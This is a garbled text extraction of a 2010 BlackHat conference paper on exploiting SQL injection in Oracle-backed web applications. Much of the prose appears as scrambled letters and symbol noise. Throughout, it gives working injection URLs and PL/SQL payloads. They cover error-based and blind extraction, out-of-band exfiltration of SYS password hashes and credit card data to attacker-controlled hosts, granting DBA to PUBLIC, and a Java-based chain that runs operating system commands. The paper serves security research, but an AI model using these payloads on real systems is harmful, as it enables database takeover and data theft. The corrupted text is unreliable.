BlackHat USA 2010 Siddharth Hacking Oracle From The Web WP

1 7Safe LlmlLed
"#$%&'( )*#$+, -*./ 01, 2,34 LxplolLlng SCL ln[ecLlon from Web AppllcaLlons

5360*#$04

1hls paper dlscusses Lhe explolLaLlon Lechnlques avallable for explolLlng SCL ln[ecLlon from web
appllcaLlons agalnsL Lhe Cracle daLabase. MosL of Lhe Lechnlques avallable over Lhe lnLerneL are
based on explolLaLlon when aLLacker has lnLeracLlve access Lo Lhe Cracle daLabase, l.e. he can
connecL Lo Lhe daLabase vla a SCL cllenL. Whlle some of Lhese Lechnlques can be dlrecLly applled
when explolLlng SCL ln[ecLlon ln web appllcaLlons, Lhls ls noL always Lrue. unllke MS-SCL, Cracle
nelLher supporLs nesLed querles, nor has any dlrecL funcLlonallLy llke xp_cmdshell Lo allow execuLlon
of operaLlng sysLem commands. LxLracLlon of senslLlve daLa from a back-end daLabase by explolLlng
SCL ln[ecLlon ln Cracle web appllcaLlons ls well known. erformlng prlvllege escalaLlon and
execuLlng operaLlng sysLem commands from web appllcaLlons ls noL wldely known, and ls Lhe
sub[ecL of Lhls paper.

2 7Safe LlmlLed

Table of Contents

789 :';,$0&.' <=< >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>?
@AB+.&0&'( 789 :';,$0&.' >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>?
<> C#0# @A0*#$0&.'>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>?
1. Lrror Messages Lnabled: ........................................................................................................4
u1L_lnAuu8.CL1_PCS1_nAML.................................................................................................4
C1xS?S.u8l1PSx.Sn....................................................................................................................3
2. Lrror Messages ulsabled: .......................................................................................................3
a) unlCn querles....................................................................................................................3
b) 8llnd ln[ecLlon.....................................................................................................................6
c) CC8 Channels .....................................................................................................................6
u1L_lnAuu8.CL1_PCS1_Auu8LSS........................................................................................6
S?S.u8MS_LuA.lnl1..............................................................................................................7
d) Peavy Cuerles.....................................................................................................................7
D> E*&F&+,(, @6$#+#0&.'>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>G
1. rlvlleged SCL ln[ecLlon: .........................................................................................................9
S?S.ku$8CC.C8LA1L_MAS1L8_8CCLSS ..................................................................10
u8MS_8LCA1_8C.vALluA1L_8LMC1L_8C ..................................................................11
2. unprlvlleged SCL ln[ecLlon ...................................................................................................11
u8MS_LxC81_Lx1LnSlCn.....................................................................................................12
H> )7 I.J, @A,$K0&.'>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><H
1. u8MS_LxC81_Lx1LnSlCn.................................................................................................13
WlLh !ava: .................................................................................................................................13
1. CreaLe [ava Llbrary: .......................................................................................................13
2. CranL !ava ermlsslons Lo SCC11: ................................................................................14
3. CreaLe luncLlon ............................................................................................................14
4. CranL funcLlon execuLe rlvlleges.................................................................................14
3. LxecuLe CS Code...........................................................................................................13
2. WlLh !ava rlvlleges ..............................................................................................................13

3 7Safe LlmlLed

a) u8MS_!AvA.8un!AvA......................................................................................................13
b) u8MS_!AvA_1LS1.lunCALL.............................................................................................13
3. WlLh S?S rlvlleges ...............................................................................................................13
u8MS_8LCA1_8C.vALluA1L_8LMC1L_8C ..........................................................................16
WlLh [ava...............................................................................................................................16
CreaLe Llbrary: ..................................................................................................................16
CranLlng !AvA permlsslons:..............................................................................................16
CreaLlng luncLlon: ............................................................................................................16
Maklng funcLlon execuLable by u8LlC............................................................................17
LxecuLlng CS Code: ...........................................................................................................17
4. WlLh u8A rlvlleges ..............................................................................................................17
S?S.ku$8CC.C8LA1L_MAS1L8_8CCLSS ..........................................................................17
u8MS_SCPLuuLL8...............................................................................................................17
CreaLe program ................................................................................................................17
CreaLe !ob.........................................................................................................................17
8emove !ob (noL 8equlred)..............................................................................................18
E9L789 :';,$0&.'>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><M
rlvllege LscalaLlon.......................................................................................................................18
CS Code LxecuLlon........................................................................................................................19
N,-,*,'$,6 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><G
53.K0 01, #K01.* >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><G

4 7Safe LlmlLed

!"# %&'()*+,& -.-
SCL ln[ecLlon ls vulnerablllLy where unsanlLlsed user's lnpuL ls used ln SCL calls. 1hls vulnerablllLy
allows an aLLacker Lo reLrleve senslLlve lnformaLlon from a back-end daLabase. 1he lmpacL of Lhls
vulnerablllLy can vary from baslc lnformaLlon dlsclosure Lo a remoLe code execuLlon and LoLal
compromlse of Lhe back-end sysLems.
L.g. LeL's look aL Lhe followlng pseudo P code:
$query = "select * from all_objects
where object_name = ".$_GET['name']. ;
1hls query Lakes user's lnpuL (name parameLer) and Lhls lnpuL ls dlrecLly passed on Lo Lhe query.
Mallclous lnpuL such as:
hLLp://vulnslLe.com/ora.php?name=' or '1'='1
1hls wlll resulL ln Lhe followlng query belng execuLed:
Select * from all_objetcs where object_name = or 1=1
1hls changes Lhe SCL loglc and Lhe query reLurns all rows from Lable all_ob[ecLs.
/012,+*+&3 !"# %&'()*+,&
LxplolLlng SCL ln[ecLlon may have dlfferenL meanlngs from one person Lo anoLher. Someone may
only be afLer Lhe senslLlve daLa wlLhln Lhe daLabase (e.g. credlL card deLalls), whlle Lhe oLhers may
wlsh Lo execuLe operaLlng sysLem commands on Lhe daLabase hosL ln order Lo compleLely
compromlse Lhe hosL. 1he remalnder of Lhls paper wlll dlscuss Lhese explolLaLlon Lechnlques:
-4 56*6 /0*76)*+,&
1he followlng Lechnlques are currenLly known Lo exLracL daLa from Lhe back-end daLabase by
explolLlng SCL ln[ecLlon from web appllcaLlons:
-4 /77,7 8(9963(9 /&6:2(;<
When Lhe daLabase error messages are enabled, an aLLacker could reLurn Lhe ouLpuL of an arblLrary
SCL query wlLhln Lhe daLabase error message. A number of funcLlons (execuLable by Lhe 'publlc'
role) can be used for Lhls:
=>#?%@A55B4C/>?DE!>?@A8/
L.g. 1he followlng mallclous lnpuL:
hLLp://192.168.2.10/ora2.php?name=' and 1=uLl_lnaddr.geL_hosL_name((selecL user from dual))--
1hls wlll resulL ln Lhe followlng SCL query:
Select * from all_objects where object_name = and
1=utl_inaddr.get_host_name((select user from dual))--

3 7Safe LlmlLed

1hls query wlll Lhrow an error whlch wlll have Lhe ouLpuL of Lhe query whlch Lhe aLLacker wanLed Lo
execuLe:
Warning: ociexecute() [function.ociexecute]: ORA-29257: host SCOTT unknown
ORA-06512: at "SYS.UTL_INADDR", line 4 ORA-06512: at "SYS.UTL_INADDR", line
35 ORA-06512: at line 1 in C:\wamp\www\ora2.php on line 13
Whlle Lhls Lechnlque wlll work ln Cracle 8, 9 and 10g, Lhls wlll fall ln 11g. 1hls ls due Lo enhanced
securlLy feaLures ln 11g whlch lmplemenLs ACLs on packages whlch requlre neLwork access such as
u1L_P11, u1L_lnAuu8 eLc.
hLLp://vulnslLe.com/ora1.php?name=' and 1=uLl_lnaddr.geL_hosL_name((selecL user from dual))--
Warning: ociexecute() [funcLlon.oclexecuLe]: ORA-24247: network access denied
by access control list (ACL) ORA-06512: at "SYS.UTL_INADDR", line 4 ORA-
06512: at "SYS.UTL_INADDR", line 35 ORA-06512: at line 1 in
C:\wamp\www\ora1.php on line 13
F>G!H!45B%>D!G4!@
Alexander kornbrusL showed LhaL alLernaLe funcLlons can be used ln 11g Lo exLracL Lhe lnformaLlon
ln error messages:
ctxsys.drithsx.sn(1,(sql query to execute))
Lxample:
hLLp://192.168.2.10/ora1.php?name=' and 1=cLxsys.drlLhsx.sn(1,(selecL user from dual))--
Warnlng: oclexecuLe() [funcLlon.oclexecuLe]: C8A-20000: Cracle 1exL error: u8C-11701: Lhesaurus
SCC11 does noL exlsL C8A-06312: aL "C1xS?S.u8uL", llne 160 C8A-06312: aL "C1xS?S.u8l1PSx", llne
338 C8A-06312: aL llne 1 ln C:\wamp\www\ora1.php on llne 13
I4 /77,7 8(9963(9 5+96:2(;<
When Lhe daLabase error messages are dlsabled Lhen Lhere a number of meLhods LhaL can be used
Lo exLracL daLa from Lhe daLabase:
unlCn Cuerles
8llnd ln[ecLlon
Peavy Cuerles
CuL-Cf-8and Channels.

1hese Lechnlques are brlefly dlscussed below, alLhough a deLalled analysls ls noL wlLhln Lhe scope of
Lhls paper.
6J =@%E@ KL(7+(9
1hls mosLly applles when Lhe SCL ln[ecLlon ls wlLhln a SLLLC1 sLaLemenL and Lhe ouLpuL of Lhe
unlCn query can be seen wlLh Lhe P11 response:

6 7Safe LlmlLed

e.g. hLLp://192.168.2.10/ora1.php?name=' unlon all selecL user from dual -
1he llmlLaLlon of Lhls Lechnlque ls LhaL Lhe query ln[ecLed by Lhe aLLacker musL maLch Lhe orlglnal
query ln number of columns and Lhelr correspondlng daLa-Lypes.
:J M2+&; %&'()*+,&
uslng Lhls meLhod an aLLacker wlll noL dlrecLly see Lhe ouLpuL of Lhe query he wanLs Lo execuLe. 1o
enumeraLe Lhe ouLpuL, he needs Lo use a seL of loglcal sLaLemenLs based on Lhe appllcaLlon's
responses. lor example:
hLLp://192.168.2.10/ora2.php?name=1LS1 (produces a glven page)
hLLp://192.168.2.10/ora2.php?name=1LS1' and (selecL user from dual)='SCC11'-- (produces Lhe
same page)
hLLp://192.168.2.10/ora2.php?name=1LS1' and (selecL user from dual)='lCC' -- (produces a
dlfferenL page)
8ased on Lhe 3 responses above lL can be deduced LhaL Lhe ouLpuL of query selecL user from dual"
ls SCC11.
O..+6: 1here are a number of Lools publlcly avallable Lo explolL bllnd SCL ln[ecLlon ln Cracle. L.g.
Sqlmap, 8sqlbf, 8sqlhacker, AbslnLhe eLc.
)J EEM FN6&&(29
uslng Lhls meLhod, Lhe lnformaLlon ls belng senL Lo an aLLacker-conLrolled server uslng Lhe neLwork
or Lhe flle sysLem. 1here are a number of funcLlons avallable under Cracle 8, 9, and 10g (81 and 82)
Lo achleve Lhls.
=>#?%@A55B4C/>?DE!>?A55B/!!
L.g. An aLLacker can make Lhe daLabase server lssue a unS resoluLlon requesL for hosL
SCC11.aLLacker.com by lssulng a SCL Cuery such as:
Select utl_inaddr.get_host_address((select user from
dual)||.attacker.com) from dual;
http://192.168.2.10/ora2.php?name=SCOTT and (select
utl_inaddr.get_host_address((select user from
dual)||'.hacker.notsosecure.com') from dual) is not null--
1hus by recelvlng such unS name resoluLlons requesLs an aLLacker can now obLaln Lhe ouLpuL of SCL
querles.
18:33:27.983431 l ?.?.?.?.33132 > x.x.x.x.33: 32849 A? SCC11.hacker.noLsosecure.com. (46)
Slmllarly, an aLLacker can also make Lhe daLabase server lssue oLher 1C requesLs (e.g. P11) and
recelve Lhe ouLpuL wlLhln Lhese 1C requesLs lssued Lo aLLacker's server. Alexander kornbrusL

7 7Safe LlmlLed

showed a neaL Lrlck aL Confldence 2009 on how by lssulng one such requesL an aLLacker can geL bulk
daLa over CC8 channels:
SelecL sum(lengLh(uLl_hLLp.requesL('hLLp://aLLacker.com/'||ccnumber||'.'||fname||'.'||lname)))
from credlLcard
hLLp://192.168.2.10/ora2.php?name=SCC11' and (selecL
sum(lengLh(uLl_hLLp.requesL('hLLp://aLLacker.com/'||ccnumber||'.'||fname||'.'||lname))) from
credlLcard)>0--
1hls one slngle requesL wlll make Lhe daLabase server recurslvely do a unS lookup for all rows wlLhln
Lhe Lable. 1hls wlll send all Lhe card numbers (CCnumber) along wlLh Lhe correspondlng flrsL name
(fname) and lasL name (lname) from CredlLcard Lable Lo aLLacker's slLe ln P11 requesLs. 1hese are
Lhe logs whlch Lhe aLLacker wlll flnd ln hls web server's access logs.
...
x.x.x.x - - [17/leb/2010:19:01:41 +0000] "CL1 /3612983023489216.LesL1.surname1 P11/1.1" 404
308 "-" "-"
308 "-" "-"
308 "-" "-"
...
1he resLrlcLlon posed by Lhls Lechnlque ls LhaL Lhe ouLbound Lrafflc from Lhe daLabase hosL should be
allowed on Lhe flrewall. ln pracLlce, unS ls usually allowed and hence Lhls Lechnlque ls very useful.
!H!45M8!?#5AO4%@%>
As noLed earller, Lhe enhanced securlLy feaLures lnLroduced ln 11g prohlblL 'publlc' from execuLlng
packages whlch could cause a neLwork connecLlon. Powever, uavld LlLchfleld ln hls recenL 8lackhaL
Lalk showed anoLher funcLlon (execuLable by publlc) LhaL can be used Lo conducL an CC8 aLLack
under 11g.
SELECT SYS.DBMS_LDAP.INIT((SELECT user from
dual)||'.databasesecurity.com',80) FROM DUAL
http://192.168.2.10/ora1.php?name=SCOTT and (SELECT
SYS.DBMS_LDAP.INIT((SELECT user from dual)||'.databasesecurity.com',80)
FROM DUAL) is not null--
;J D(6PQ "L(7+(9
lf Lhe SCL ln[ecLlon ls noL wlLhln a SLLLC1 sLaLemenL (e.g. lnSL81 SLaLemenL), Lhen alLhough Lhe
query ln[ecLed by Lhe aLLacker wlll geL execuLed on Lhe daLabase server, lL may noL be posslble Lo
manlpulaLe Lhe ouLpuL of Lhe query as Lhe P11 response reLurned by Lhe appllcaLlon wlll noL dlffer.

8 7Safe LlmlLed

lurLher, lf Lhe daLabase has egress fllLerlng enabled Lhen Lhe CC8 aLLack wlll noL be successful. 1hls
meLhod ls perhaps Lhe lasL resource avallable Lo exLracL Lhe ouLpuL of Lhe SCL query.
lor Lxample, LeL's look aL Lhe followlng P code:
<?php
error_reporLlng(0),
$conn=ocl_connecL("scoLL", "Llger", '//192.168.2.11:1321/orcl'),
$sql = "lnSL81 ln1C u8AW vALuLS ('".$_CL1['number']."')",
$sLmL = ocl_parse($conn,$sql),
echo "1hank ?ou lor ?our Submlsslon",
ocl_execuLe($sLmL),
?>
1he appllcaLlon performs an lnserL query on Lhe user supplled lnpuL and dlsplays Lhe same message
1hank ?ou lor ?our Submlsslon" lrrespecLlve of wheLher Lhe query execuLed successfully or noL.
1hls makes lL dlfflculL Lo manlpulaLe Lhe ouLpuL of loglcal sLaLemenLs lssued by Lhe aLLacker and
hence Lhe bllnd ln[ecLlon Lechnlque wlll fall here.
MS-SCL and MySCL have funcLlons whlch can be called Lo make Lhe daLabase server sleep for a
cerLaln amounL of Llme. 1hus Lhe ouLpuL of Lhe ln[ecLed SCL query can be manlpulaLed dependlng
upon Lhe Llme Laken by Lhe daLabase/appllcaLlon server Lo respond. Powever, as Lhere ls no such
funcLlon avallable ln Cracle, a slmllar approach ls Lo make Lhe daLabase lssue a heavy query whlch
wlll resulL ln a Llme delay. 1he end resulL ls LhaL Lhe loglcal sLaLemenLs lssued by Lhe aLLacker can be
manlpulaLed as Lrue or false dependlng upon Lhe Llme Laken for Lhe P11 response.
http://192.168.2.10/ora11.php?number=2222222'||(select 1 from dual where
(select count(*)from all_users t1, all_users t2, all_users t3, all_users
t4, all_users t5)>0 and (select user from dual)='SCOTT'))--
INSERT INTO DRAW VALUES('XXX2222222'||(select 1 from dual where (select
count(*)from all_users t1, all_users t2, all_users t3, all_users t4,
all_users t5)>0 and (select user from dual)='SCOTT'))--
8K,*P 9#606 H= 6,$.'J6
http://192.168.2.10/ora11.php?number=2222222'||(select 1 from dual where
(select count(*)from all_users t1, all_users t2, all_users t3, all_users
t4, all_users t5)>0 and (select user from dual)='XXXX'))--
INSERT INTO DRAW VALUES('2222222'||(select 1 from dual where (select
count(*)from all_users t1, all_users t2, all_users t3, all_users t4,
all_users t5)>0 and (select user from dual)='XXXX'))--
8K,*P 9#606 < 6,$.'J
1he above 2 requesLs show LhaL Lhe ouLpuL of Lhe aLLacker's query ls SCC11

9 7Safe LlmlLed

I4 O7+P+2(3( /9)626*+,&
1he abovemenLloned Lechnlques wlll allow an aLLacker Lo obLaln Lhe ouLpuL of an arblLrary SCL
query. 1he lmporLanL Lhlng Lo undersLand here ls Lhe prlvlleges wlLh whlch an aLLacker's query geLs
execuLed. 1here can be 2 broad caLegorles here:
1. rlvlleged SCL ln[ecLlon
2. un rlvlleged SCL ln[ecLlon
-4 O7+P+2(3(; !"# %&'()*+,&<
8y rlvlleged SCL ln[ecLlon l lmply LhaL Lhe aLLacker's query geLs execuLed as S?S user (or wlLh u8A
prlvlleges) and Lhus he has access Lo enLlre daLabase. 1here can be qulLe a few posslblllLles such as:
1. ConnecLlon SLrlng has a prlvlleged user.
2. SCL ln[ecLlon ls ln a sLored procedure whlch geLs execuLed as S?S (or wlLh u8A prlvlleges).

SLored procedures ln Cracle by defaulL geL execuLed wlLh deflner rlghLs. 1hus, lf S?S has a vulnerable
procedure whlch SCC11 can execuLe, Lhan SCC11 can execuLe SCL querles as S?S.

Lxample:
create or replace PROCEDURE
SYS.countpass(name IN VARCHAR2, message out varchar2)
AS
str varchar2(500);
BEGIN
str :='select count(PASSWORD) FROM SYS.USER$
WHERE NAME like ''%'||name||'%''';
Execute immediate str into message;
END;
/
Grant execute on SYS.countpass to SCOTT;

1hls procedure can be called from a web appllcaLlon. 1he followlng P code (ora6.php)
demonsLraLes Lhls:

<?php
$conn = oci_connect('SCOTT','TIGER') or die;

$sql = 'BEGIN SYS.countpass(:name, :message); END;';

$stmt = oci_parse($conn,$sql);

// Bind the input parameter
oci_bind_by_name($stmt,':name',$name,1000);

// Bind the output parameter
oci_bind_by_name($stmt,':message',$message,1000);

// Assign a value to the input
$name = $_GET['name'];

10 7Safe LlmlLed

oci_execute($stmt);

// $message is now populated with the output value
print "$message";

?>
ln Lhls example alLhough P uses blnd varlables lL does noL help as Lhe procedure ls sLlll vulnerable.
lurLher, alLhough Lhe appllcaLlon connecLs Lo Lhe daLabase as an unprlvlleged user (SCC11), Lhe
ln[ecLlon polnL ls ln a procedure owned by S?S and Lherefore Lhe aLLacker can execuLe SCL querles as
S?S.
L.g.
hLLp://192.168.2.10/ora6.php?name=SCC11
8eLurns 1 <1rue page>
hLLp://192.168.2.10/ora6.php?name=SCC11' and (selecL password from sys.user$ where
rownum=1)='286L1LA8l2Clu262'--
8eLurns 1 <1rue page>
hLLp://192.168.2.10/ora6.php?name=SCC11' and (selecL password from sys.user$ where
rownum=1)='xxxxxxxxxxxx'-
8eLurns 0 <lalse page>
1hls lmplles LhaL Lhe aLLacker can run SCL as S?S user (access sys.user$ Lable) and Lhe example
demonsLraLes how an aLLacker can obLaln Lhe password hash of S?S user uslng bllnd ln[ecLlon
Lechnlque descrlbed earller.
WhaL lf Lhe aLLacker wanLs Lo execuLe uuL/uML SLaLemenLs such as 'C8An1 u8A 1C u8LlC'?
Cracle daLabase poses a number of problems ln execuLlng uuL/uML sLaLemenLs when explolLlng SCL
ln[ecLlons from web appllcaLlons malnly because Cracle by deslgn does noL supporL nesLed querles.
ln order Lo achleve Lhls, we musL flnd a funcLlon whlch could elLher dlrecLly Lake L/SCL and execuLe
lL as a feaLure or flnd a funcLlon whlch ls vulnerable Lo L/SCL ln[ecLlon.
uavld LlLchfleld recenLly showed a few funcLlons whlch could allow an aLLacker Lo achleve Lhls:
SYS.K0PP$PR0C.CREATE_NASTER_PR0CESS
5--,$0,J 7P60,/64 11g 81 and 82 (0 day)
C,6$*&B0&.'4 1he execuLlon of a L/SCL sLaLemenL wlLhln Lhls funcLlon ls a feaLure and noL a bug.
1hls funcLlon ls noL execuLable by u8LlC. Any user wlLh u8A role can execuLe Lhls funcLlon. As our
ln[ecLlon polnL was ln a procedure owned by S?S, we can execuLe Lhls funcLlon.
http://192.168.2.10/ora6.php?name=SCOTT and (Select
SYS.KUPP$PROC.CREATE_MASTER_PROCESS('EXECUTE IMMEDIATE ''DECLARE PRAGMA

11 7Safe LlmlLed

AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''GRANT DBA TO
PUBLIC''''; END;'';') from dual) is not null--

BBNS_REPCAT_RPC.vALIBATE_REN0TE_RC
5--,$0,J 7P60,/64 8, 9, 10g 81, 82, 11g 81 (llxed ln Cu !uly 2009)
1hls funcLlon can only be execuLed by S?S. lL uses deflner rlghLs (S?S) for execuLlon. unllke Lhe
prevlous funcLlon, Lhls one execuLes L/SCL due Lo a flaw (L/SCL ln[ecLlon) and noL a feaLure.
DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_
gname); execute immediate ''declare pragma autonomous_transaction;begin
execute immediate ''''grant dba to scott'''';end;''; end;--','CCCC') from
dual) is not null--
I4 =&17+P+2(3(; !"# %&'()*+,&
ln Lhe example descrlbed above, Lhe ln[ecLlon polnL was ln a procedure whlch geLs execuLed as S?S
and hence prlvlleged, buL whaL lf Lhe SCL ln[ecLlon ls noL prlvlleged, LhaL ls:
1. ln[ecLlon ls ln a SCL sLaLemenL and geLs execuLed as unprlvlleged user:
$conn = oci_connect("scott", "tiger", '//192.168.2.10:1521/orcl.com');
$query = "select text2 from foo2 where id = ".$_GET['name'];

2. ln[ecLlon ls ln a procedure whlch geLs execuLed as an unprlvlleged user:
CREATE OR REPLACE PROCEDURE
SCOTT.countobject(name IN VARCHAR2, message out varchar2)AUTHID
CURRENT_USER AS
str varchar2(500);
BEGIN
str :='select count(object_name) from all_objects where object_name like
''%'||name||'%''';
execute immediate str into message ;
END;

The following php script(ora7.php) now calls this procedure:

<?php

$sql = 'BEGIN SCOTT.countobject(:name, :message); END;';



// Bind the output parameter

12 7Safe LlmlLed

oci_bind_by_name($stmt,':message',$message,1000);


oci_execute($stmt);

// $message is now populated with the output value
print "$message";
?>

Pere Lhe aLLacker's query wlll be execuLed as SCC11 user. LeL's see lf we can sLlll obLaln Lhe
password hash of S?S user:
http://192.168.2.10/ora7.php?name=SCOTT' and (select password from
sys.user$ where rownum=1)='286E1EA8F2CFD262'--

1hls query wlll now fall as Lhe ln[ecLlon ls unprlvlleged and Lhe user SCC11 does noL have access Lo
Lhe sys.user$ Lable. lf Lhe error messages are enabled on Lhe appllcaLlon Lhen Lhe followlng error wlll
be dlsplayed:

Warning: oci_execute() [function.oci-execute]: ORA-00942: table or view
does not exist ORA-06512: at "SCOTT.countobject", line 8 ORA-06512: at line
1 in C:\wamp\www\ora7.php on line 18

1hls ls where Lhlngs sLarL geLLlng lnLeresLlng". 1hose of you famlllar wlLh MS-SCL may recall LhaL
MS-SCL has a feaLure called CpenrowseL whlch (lf enabled) could allow an aLLacker Lo bruLe-
force/guess 'SA' password and Lhen run SCL querles as 'SA'.

ln Cracle a slmllar prlvllege escalaLlon can be achleved under cerLaln clrcumsLances. AL Lhe Llme of
wrlLlng Lhls paper Lhe followlng Lechnlques are !"#$%&$' )*+,*
-
:
5M8!?/GOEB>?/G>/@!%E@
5--,$0,J Q,*6&.'64 Cracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2, xL (llxed ln
Cu !uly 2006)
E*&F&+,(, *,RK&*,J: none
C,6$*&B0&.': 1hls package has had number of funcLlons vulnerable Lo L/SCL ln[ecLlon. 1hese
funcLlons are owned by S?S, execuLe as S?S and are execuLable by u8LlC. 1hus, lf Lhe SCL ln[ecLlon
ls ln any of Lhe un-paLched Cracle daLabase verslons menLloned above Lhen Lhe aLLacker can call Lhls
funcLlon and dlrecLly execuLe querles as S?S.
L.g.
http://192.168.2.10/ora7.php?name=SCOTT and
chr(44)=SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS
_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA

1
Whlle an efforL has been made Lo collecL all publlcly known Lechnlques, lL may be posslble LhaL Lhere are
oLher prlvllege escalaLlon Lechnlques known.

13 7Safe LlmlLed

AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' grant dba to
public'''';END;'';END;--','SYS',0,'1',0)--

1hls requesL wlll resulL ln Lhe query 'C8An1 u8A 1C u8LlC' geLLlng execuLed as S?S. 1hls funcLlon
allows L/SCL because of a flaw (L/SCL ln[ecLlon) .Cnce Lhls requesL ls successfully execuLed, Lhe
u8LlC geLs u8A role Lhus escalaLlng SCC11's prlvlleges and now our SCC11 user can query sys.user$
Lable:

http://192.168.2.10/ora7.php?name=SCOTT' and (select password from
sys.user$ where rownum=1)='286E1EA8F2CFD262'--

O..+4 8sqlbf has Lhls feaLure of dolng prlvllege escalaLlon flrsL and Lhen exLracLlng daLa wlLh u8A
prlvlleges. AfLer exLracLlng daLa lL revokes Lhe u8A role from u8LlC.

Whlle Lhere are no oLher !"#$%&$' )*+,* Lechnlques by whlch an aLLacker can become u8A from [usL
C8LA1L SLSSlCn prlvllege by explolLlng SCL ln[ecLlon from web appllcaLlons, Lhere are sLlll a few
aLLack vecLors wlLh whlch an aLLacker can execuLe operaLlng sysLem commands wlLhouL havlng u8A
role (wlLh !AvA prlvlleges). 1hls ls dlscussed below.
R4 E! F,;( /0()L*+,&
1he followlng aLLack vecLors are currenLly publlcly known for execuLlng operaLlng sysLem commands
agalnsL Lhe Cracle daLabase whlle explolLlng SCL ln[ecLlon from web appllcaLlons:
-4 5M8!?/GOEB>?/G>/@!%E@
5--,$0,J Q,*6&.'64 Cracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2, xL
E*&F&+,(, *,RK&*,J: none
C,6$*&B0&.': As noLed under prlvllege escalaLlon, Lhe funcLlons wlLhln Lhls package, vulnerable Lo
L/SCL ln[ecLlon, can be used Lo flrsLly galn u8A prlvlleges and Lhen CperaLlng SysLem
Commands can be execuLed by a number of Lechnlques such as:
CreaLlng !AvA llbrary
u8MS_SCPLuuLL8
Lx18CC
L/SCL naLlve make uLlllLy (9l only)
1he followlng demonsLraLes on how Lo do Lhls wlLh !ava.
S+*N T6P6<
-4 F7(6*( '6P6 #+:767Q<
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT"
.PUT(:P1);EXECUTE IMMEDIATE
''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create
or replace and compile java source named

14 7Safe LlmlLed

"LinxUtil" as import java.io.*; public class LinxUtil extends Object
{public static String runCMD(String args)
{try{BufferedReader myReader= new BufferedReader(new InputStreamReader(
Runtime.getRuntime().exec(args).getInputStream()
) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str
%2b=stemp%2b"\n";myReader.close();return
str;} catch (Exception e){return e.toString();}}public static String
readFile(String filename){try{BufferedReader
myReader= new BufferedReader(new FileReader(filename)); String
stemp,str="";while ((stemp = myReader.readLine()) !=
null) str %2b=stemp%2b"\n";myReader.close();return str;} catch (Exception
e){return
e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

I4 C76&* T6P6 O(7U+99+,&9 *, !FE>><

''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin
dbms_java.grant_permission(
''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''',
''''''''<>'''''''', ''''''''execute''''''''
);end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

R4 F7(6*( VL&)*+,&
''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create
or replace function LinxRunCMD(p_cmd in
varchar2) return varchar2 as language java name
''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';
'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

W4 C76&* XL&)*+,& (0()L*( O7+P+2(3(9
''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant
all on LinxRunCMD to
public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null --

13 7Safe LlmlLed

Y4 /0()L*( E! F,;(
sys.LinxRunCMD('cmd.exe /c whoami') from dual) is not null--

Slmllarly, one can execuLe CS code vla Lhls L/SCL ln[ecLlon Lhrough oLher meLhods such as
u8MS_SCPLuuLL8, L/SCL naLlve make uLlllLy eLc.
O..+4 8sqlbf lncorporaLes Lhese meLhods of CS Code execuLlon.
I4 S+*N T6P6 O7+P+2(3(9
5--,$0,J Q,*6&.'64 10g 82, 11g 81 and 11g 82 (0 day aL Lhe Llme of wrlLlng)
E,*/&66&.'6 *,RK&*,J: !ava ermlsslons.
C,6$*&B0&.'4 uavld LlLchfleld recenLly demonsLraLed LhaL lf Lhe user has !ava prlvlleges Lhen
operaLlng sysLem commands can be execuLed from web appllcaLlons uslng 2 dlfferenL funcLlons:
6J 5M8!?TAZA4B=@TAZA
